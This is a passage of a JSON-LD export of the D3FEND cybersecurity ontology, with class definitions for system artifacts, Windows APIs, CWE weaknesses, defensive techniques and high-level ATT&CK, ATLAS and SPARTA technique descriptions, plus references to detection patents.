      "d3f:definition": "A system utilization record is a record for the tracking of resource utilization e.g. CPU, Disk, Network, Memory Bandwidth, GPU, or other resources for a given time period.",
      "rdfs:label": "System Utilization Record",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:DHCPRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends a REQUEST message to confirm or renew its desired IP configuration with a specific DHCP server.",
      "rdfs:label": "DHCP Request Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N8ba95a4c9fcd4a458e0c1b9dd5bdffaa"
        }
      ],
      "skos:altLabel": "DHCPREQUEST"
    },
    {
      "@id": "_:N8ba95a4c9fcd4a458e0c1b9dd5bdffaa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPOfferEvent"
      }
    },
    {
      "@id": "d3f:UserProfile",
      "@type": "owl:Class",
      "d3f:definition": "A user profile is a collection of settings and information associated with a user. It contains critical information that is used to identify an individual, such as their name, age, portrait photograph and individual characteristics such as knowledge or expertise.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_profile"
      },
      "rdfs:label": "User Profile",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/User_profile"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:AccessPolicyAdministration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccessPolicyAdministration"
      ],
      "d3f:d3fend-id": "D3-APA",
      "d3f:definition": "Access policy administration is the systematic process of defining, implementing, and managing access control policies that dictate user permissions to resources.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:synonym": "Access Control Administration",
      "rdfs:label": "Access Policy Administration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N1089ed46540c45a59aaa988b5a74de55"
        }
      ]
    },
    {
      "@id": "_:N1089ed46540c45a59aaa988b5a74de55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:FlashMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Flash memory is an electronic non-volatile computer memory storage medium that can be electrically erased and reprogrammed.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Flash_memory"
      },
      "rdfs:label": "Flash Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:TimeInstant",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A time instant is a zero-dimensional temporal region that has no duration and represents a singular point in the temporal continuum. Time instants serve as the temporal boundaries of temporal intervals and as the indexical points at which continuants exist and bear their qualities.",
      "rdfs:label": "Time Instant",
      "rdfs:subClassOf": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:T1404",
      "@type": "owl:Class",
      "d3f:attack-id": "T1404",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in order to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.",
      "rdfs:label": "Exploitation for Privilege Escalation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Exploitation for Privilege Escalation"
    },
    {
      "@id": "d3f:DS0010",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs",
      "d3f:exactly": {
        "@id": "d3f:CloudStorage"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Cloud Storage Metadata component",
      "rdfs:label": "Cloud Storage (ATT&CK DS)"
    },
    {
      "@id": "d3f:AccessControlEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures the implementation or evaluation of access control measures, including the application of rules and policies to govern the accessibility of resources by agents within a digital system.",
      "rdfs:label": "Access Control Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthorizationEvent"
        },
        {
          "@id": "_:Nb46ffc261e1b40d8b14b68332a6bf373"
        }
      ]
    },
    {
      "@id": "_:Nb46ffc261e1b40d8b14b68332a6bf373",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-61",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-61",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "d3f:synonym": [
        "Symlink following",
        "symlink vulnerability"
      ],
      "rdfs:label": "UNIX Symbolic Link (Symlink) Following",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:OTDebugCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Investigate or analyze the current state of the system.",
      "rdfs:label": "OT Debug Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N30d45941b0fe40b18a2a672d25875cee"
        }
      ]
    },
    {
      "@id": "_:N30d45941b0fe40b18a2a672d25875cee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDebugCommand"
      }
    },
    {
      "@id": "d3f:CWE-296",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-296",
      "d3f:definition": "The product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.",
      "rdfs:label": "Improper Following of a Certificate's Chain of Trust",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:T1625",
      "@type": "owl:Class",
      "d3f:attack-id": "T1625",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time.",
      "rdfs:label": "Hijack Execution Flow - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Hijack Execution Flow"
    },
    {
      "@id": "d3f:CWE-1386",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1386",
      "d3f:definition": "The product opens a file or directory, but it does not properly prevent the name from being associated with a junction or mount point to a destination that is outside of the intended control sphere.",
      "rdfs:label": "Insecure Operation on Windows Junction / Mount Point",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:RPCNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "RPC network traffic is network traffic related to remote procedure calls between network nodes..This includes only network traffic conforming to a standard RPC protocol; not custom protocols.",
      "rdfs:label": "RPC Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:may-counter",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-counter",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-321",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-321",
      "d3f:definition": "The product uses a hard-coded, unchangeable cryptographic key.",
      "rdfs:label": "Use of Hard-coded Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-798"
      }
    },
    {
      "@id": "d3f:Graph-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBC",
      "d3f:definition": "Graph-based Clustering is a form of clustering where data is represented with graphs to identify clusters.  We include Connection-based Clustering in this class.",
      "d3f:kb-article": "## References\n1. Jagota, A. (13 Dec 2020). Density-based and Graph-based Clustering. towardsdatascience.com. [Link](https://towardsdatascience.com/density-based-and-graph-based-clustering-a1f0d45ff5fb)\n\n1. Connectivity-Based Clustering. Sarang, P. (2023) in Thinking Data Science. The Springer Series in Applied Machine Learning. Springer, Cham. [Link](https://doi.org/10.1007/978-3-031-02363-7_10).",
      "d3f:synonym": "Connection-based Clustering",
      "rdfs:label": "Graph-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-009%3ACompiledHTMLAccess_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-009/"
      },
      "d3f:kb-abstract": "Adversaries may hide malicious code in .chm compiled HTML files. When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-009: Compiled HTML Access",
      "rdfs:label": "Reference - CAR-2020-11-009: Compiled HTML Access - MITRE"
    },
    {
      "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190026466A1"
      },
      "d3f:kb-abstract": "Example techniques herein determine that a trial data stream is associated with malware (\"dirty\") using a local computational model (CM). The data stream can be represented by a feature vector. A control unit can receive a first, dirty feature vector (e.g., a false miss) and determine the local CM based on the first feature vector. The control unit can receive a trial feature vector representing the trial data stream. The control unit can determine that the trial data stream is dirty if a broad CM or the local CM determines that the trial feature vector is dirty. In some examples, the local CM can define a dirty region in a feature space. The control unit can determine the local CM based on the first feature vector and other clean or dirty feature vectors, e.g., a clean feature vector nearest to the first feature vector.",
      "d3f:kb-author": "Sven Krasser, David Elkind, Patrick Crenshaw, Kirby James Koster",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Malware detection using local computational models",
      "rdfs:label": "Reference - Malware detection using local computational models - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T1613",
      "@type": "owl:Class",
      "d3f:attack-id": "T1613",
      "d3f:definition": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.",
      "rdfs:label": "Container and Resource Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:T1491",
      "@type": "owl:Class",
      "d3f:attack-id": "T1491",
      "d3f:definition": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.",
      "rdfs:label": "Defacement",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:ProcessorComponent",
      "@type": "owl:Class",
      "d3f:definition": "A Processor Component is a functional subunit or module within a processor that performs specific tasks to support the processor's overall operation.",
      "rdfs:label": "Processor Component",
      "rdfs:seeAlso": {
        "@id": "d3f:Processor"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:NetworkFlowSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors network traffic and produces summaries of data flows traversing the network.",
      "d3f:monitors": {
        "@id": "d3f:NetworkFlow"
      },
      "rdfs:label": "Network Flow Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkSensor"
        },
        {
          "@id": "_:N1df765defdb7493fb32ee5e4db7b18fc"
        }
      ]
    },
    {
      "@id": "_:N1df765defdb7493fb32ee5e4db7b18fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFlow"
      }
    },
    {
      "@id": "d3f:records",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x records y: The digital artifact x makes a record of events y; set down in permanent form.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01002259-v"
      },
      "rdfs:label": "records",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01003181-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1555.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:DatabaseFile"
      },
      "d3f:attack-id": "T1555.003",
      "d3f:definition": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.",
      "d3f:may-access": {
        "@id": "d3f:In-memoryPasswordStore"
      },
      "d3f:may-invoke": {
        "@id": "d3f:ReadFile"
      },
      "rdfs:label": "Credentials from Web Browsers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:N745e22bfb3ab4237b1af9b6aba2753e8"
        },
        {
          "@id": "_:N219f8d42b3d34e0fb5a19f6cfd420f7d"
        },
        {
          "@id": "_:N90fd298c7aff4cd591ed4586b02563da"
        }
      ]
    },
    {
      "@id": "_:N745e22bfb3ab4237b1af9b6aba2753e8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseFile"
      }
    },
    {
      "@id": "_:N219f8d42b3d34e0fb5a19f6cfd420f7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:In-memoryPasswordStore"
      }
    },
    {
      "@id": "_:N90fd298c7aff4cd591ed4586b02563da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadFile"
      }
    },
    {
      "@id": "d3f:GetSystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that gets the system time.  For POSIX.1 systems, time() invokes a call to get the system time.",
      "rdfs:label": "Get System Time",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/time.2.html"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:has-agent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-agent y: The event x occurs because agent y actively carries it out.",
      "rdfs:label": "has-agent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:DecoyNetworkResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyNetworkResource"
      ],
      "d3f:d3fend-id": "D3-DNR",
      "d3f:definition": "Deploying a network resource for the purposes of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nDecoy network resources are deployed to web application servers, network file shares, or other network based sharing services.\n\nA \"honeypot\" may serve a variety of decoy network resources.\n\n## Considerations\n\n* Developing a deployment and placement strategy for the decoy network resource.\n* Personnel responsible for creation of decoy networks should consider the potential for resource exhaustion through denial of service attacks.\n\n## Examples\n* Honeypots are typically used to mimic a known system with fake vulnerabilities. This may attract attackers to the honeypot.\n* Decoy accounts are also used to scan for attempted logins. The decoy accounts can provide security analysts with the attacker's potential intents and strategies.\n* Tarpits are used to monitor unallocated IP space for unauthorized network activity.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingNetworkResourceGroupsAndAssigningCustomizedDecoyPoliciesThereto_IllusiveNetworksLtd"
        },
        {
          "@id": "d3f:Reference-Deception-BasedResponsesToSecurityAttacks_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Decoy Network Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Na729d0a8fd8d457d91ecd47a9ffeec58"
        }
      ]
    },
    {
      "@id": "_:Na729d0a8fd8d457d91ecd47a9ffeec58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:CWE-835",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-835",
      "d3f:definition": "The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.",
      "rdfs:label": "Loop with Unreachable Exit Condition ('Infinite Loop')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:CWE-663",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-663",
      "d3f:definition": "The product calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state.",
      "rdfs:label": "Use of a Non-reentrant Function in a Concurrent Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:Reference-AnomalyDetectionUsingAdaptiveBehavioralProfiles_SecuronixInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160226901A1"
      },
      "d3f:kb-abstract": "The invention provides a system and method for automatic creation of adaptive behavioral profiles for observables associated with resource states and events in a computer network (IT) infrastructure of an enterprise and for detecting anomalies that represent potential malicious activity and threats as deviations from normal behavior. Separate profiles may be created for each behavioral indicator, as well as for each time series of measurements, and aggregated to create an overall behavioral profile. An anomaly probability is determined from the behavioral profile and used to evaluate the data values of observables. Outlier data values which deviate from normal behavior by more than a predetermined probability threshold are identified for risk analysis as possible threats while inliers within the range of normal behavior are used to update the behavioral profile. Behavioral profiles are created for behavioral indicators based upon observables measured over predetermined time periods using algorithms employing statistical analysis approaches that work for any type of data distribution, and profiles are adapted over time using data aging to more closely represent current behavior. Algorithm parameters for creating profiles are based on the type of data, i.e., its metadata.",
      "d3f:kb-author": "Igor A. Baikalov; Tanuj Gulati; Sachin Nayyar; Anjaneya Shenoy; Ganpatrao H. Patwardhan",
      "d3f:kb-mitre-analysis": "The patent describes a technique for detecting anomalous activity within an organization's IT infrastructure to identify threats. Behavioral profiles can be grouped by peer groups that identify functionally similar groups of actors (users or resources) based on their attributes and pre-defined grouping rules. For example, users can be grouped by their job title, organizational hierarchy, or location and can be observed for similarities in access patterns, based on granted access entitlements or actual logged resource access.\n\nBehavioral profiles are created from measurements of events over a time period, for example:\n\n* Transaction counts\n* Concurrent users per hour\n* Daily volume of data\n\nOutlier data values which deviate from the behavioral profile by more than a predetermined probability threshold are identified for risk analysis as possible threats.",
      "d3f:kb-organization": "Securonix Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:JobFunctionAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "Anomaly Detection Using Adaptive Behavioral Profiles",
      "rdfs:label": "Reference - Anomaly Detection Using Adaptive Behavioral Profiles - Securonix Inc"
    },
    {
      "@id": "d3f:M1020",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3FEND models this as an infrastructure dependency to support D3-NTA.",
      "d3f:related": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SSL/TLS Inspection"
    },
    {
      "@id": "d3f:WindowsNtFreeVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtFreeVirtualMemory routine releases, decommits, or both releases and decommits, a region of pages within the virtual address space of a specified process.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntfreevirtualmemory"
      },
      "rdfs:label": "Windows NtFreeVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFreeMemory"
      }
    },
    {
      "@id": "d3f:WindowsCreateFileA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates or opens a file or I/O device. The most commonly used I/O devices are as follows: file, file stream, directory, physical disk, volume, console buffer, tape drive, communications resource, mailslot, and pipe. The function returns a handle that can be used to access the file or device for various types of I/O depending on the file or device and the flags and attributes specified.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateFile"
        },
        {
          "@id": "d3f:WindowsNtCreateMailslotFile"
        },
        {
          "@id": "d3f:WindowsNtCreateNamedPipeFile"
        },
        {
          "@id": "d3f:WindowsNtCreatePagingFile"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea"
      },
      "rdfs:label": "Windows CreateFileA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateFile"
        },
        {
          "@id": "d3f:OSAPIOpenFile"
        },
        {
          "@id": "_:N4274fa726b7b432c85ffa3a4e0112bdf"
        },
        {
          "@id": "_:Na4bba0db2a5c49a1b672c64eb75ede12"
        },
        {
          "@id": "_:N0dce6140ab1d4dfba65a2469fbac8601"
        },
        {
          "@id": "_:N4588bee8a34e45dfb06c6ddf154ea7f8"
        }
      ]
    },
    {
      "@id": "_:N4274fa726b7b432c85ffa3a4e0112bdf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateFile"
      }
    },
    {
      "@id": "_:Na4bba0db2a5c49a1b672c64eb75ede12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateMailslotFile"
      }
    },
    {
      "@id": "_:N0dce6140ab1d4dfba65a2469fbac8601",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateNamedPipeFile"
      }
    },
    {
      "@id": "_:N4588bee8a34e45dfb06c6ddf154ea7f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreatePagingFile"
      }
    },
    {
      "@id": "d3f:Reference-MITREATTACKPasswordPolicies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://attack.mitre.org/mitigations/M0927/"
      },
      "d3f:kb-abstract": "Set and enforce secure password policies for accounts.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ChangeDefaultPassword"
      },
      "d3f:kb-reference-title": "MITRE ATT&CK - Password Policies",
      "rdfs:label": "Reference - MITRE ATT&CK - Password Policies"
    },
    {
      "@id": "d3f:AML.T0000.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.000",
      "d3f:definition": "Many of the publications accepted at premier artificial intelligence conferences and journals come from commercial labs.\nSome journals and conferences are open access, others may require paying for access or a membership.\nThese publications will often describe in detail all aspects of a particular approach for reproducibility.\nThis information can be used by adversaries to implement the paper.",
      "rdfs:label": "Journals and Conference Proceedings - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Journals and Conference Proceedings"
    },
    {
      "@id": "d3f:T1568.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.001",
      "d3f:definition": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)",
      "rdfs:label": "Fast Flux DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:ATTACKMobileInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0027"
      },
      "rdfs:label": "Initial Access Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N66da41f1a214466380e71f6beb377593"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:N66da41f1a214466380e71f6beb377593",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0027"
      }
    },
    {
      "@id": "d3f:DatabaseServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application that interacts with a database management system (DBMS) hosted as a separate, standalone service or server.",
      "d3f:instructs": {
        "@id": "d3f:DatabaseService"
      },
      "rdfs:label": "Database Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseApplication"
        },
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:Nf448ca3792de47139e80c0a719622251"
        }
      ]
    },
    {
      "@id": "_:Nf448ca3792de47139e80c0a719622251",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseService"
      }
    },
    {
      "@id": "d3f:REC-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003",
      "d3f:definition": "Threat actors assemble a detailed picture of the mission’s RF and networking posture across TT&C and payload links. Useful elements include frequency bands and allocations, emission designators, modulation/coding, data rates, polarization sense, Doppler profiles, timing and ranging schemes, link budgets, and expected Eb/N0 margins. They also seek antenna characteristics, beacon structures, and whether transponders are bent-pipe or regenerative. On the ground, they track station locations, apertures, auto-track behavior, front-end filters/LNAs, and handover rules, plus whether services traverse SLE, SDN, or commercial cloud backbones. Even small details, polarization sense, roll-off factors, or beacon cadence, shrink the search space for interception, spoofing, or denial. The outcome is a lab-replicable demod/decode chain and a calendar of advantageous windows.",
      "rdfs:label": "Gather Spacecraft Communications Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Communications Information"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForPreventingRansomwareFromEncryptingDataElementsStoredInAMemoryOfAComputer-basedSystem_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170308711A1/en?oq=US-2017308711-A1"
      },
      "d3f:kb-abstract": "A computerized method for preventing ransomware from encrypting data elements stored in a memory of a computer-based system, the method comprising identifying at least one identifier for a data element, wherein the at least one identifier indicates at least a position of the data element within the memory. An optimal number of virtual traps is determined for the data element corresponding to the at least one identifier. An optimal position for each of the virtual traps is determined corresponding to the at least one identifier. The virtual traps are sent to the determined optimal position within the memory.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system",
      "rdfs:label": "Reference - System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:T1036.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.008",
